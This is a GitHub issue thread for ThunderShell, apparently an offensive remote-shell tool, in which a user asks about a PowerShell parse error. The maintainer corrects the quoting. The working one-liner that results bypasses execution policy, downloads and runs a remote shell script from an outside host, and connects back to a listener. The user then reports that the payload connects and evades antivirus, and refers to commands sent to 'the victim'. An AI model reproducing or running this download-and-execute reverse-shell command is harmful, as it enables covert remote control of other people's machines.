### ISSUE TITLE
Why did this error occur?

### ISSUE THREAD

**Issue by djwesleyborges** [Mr-Un1k0d3r/ThunderShell#1]
Why did this error occur?

C:\Windows\system32>powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.100/PS-RemoteShell.ps1"); PS-RemoteShell.ps1 -ip 192.168.1.100 -port 8080 -Key test -Delay 2000
No linha:1 caractere:47
+ IEX (New-Object Net.WebClient).DownloadString(http://192.168.1.100/PS ...
+                                               ~
')' ausente na chamada do método.
No linha:1 caractere:86
+ ... ient).DownloadString(http://192.168.1.100/PS-RemoteShell.ps1); PS-Rem ...
+                                                                 ~
Token ')' inesperado na expressão ou instrução.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : MissingEndParenthesisInMethodCall

**Comment by Mr-Un1k0d3r** [comment]
Fixed the ReadMe you should use single quote instead of double quote.

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/PS-RemoteShell.ps1'); PS-RemoteShell.ps1 -ip 192.168.1.100 -port 8080 -Key test -Delay 2000

**Comment by djwesleyborges** [comment]
Thank you it worked, the payload connects normal and the AV does not detect, but the interaction commands with the victim did not work.
I'll work on the code and see if I can change anything.
Sorry for my english, I'm using google translate, I'm brazilian and I'm not fit for your language yet rsrsrs
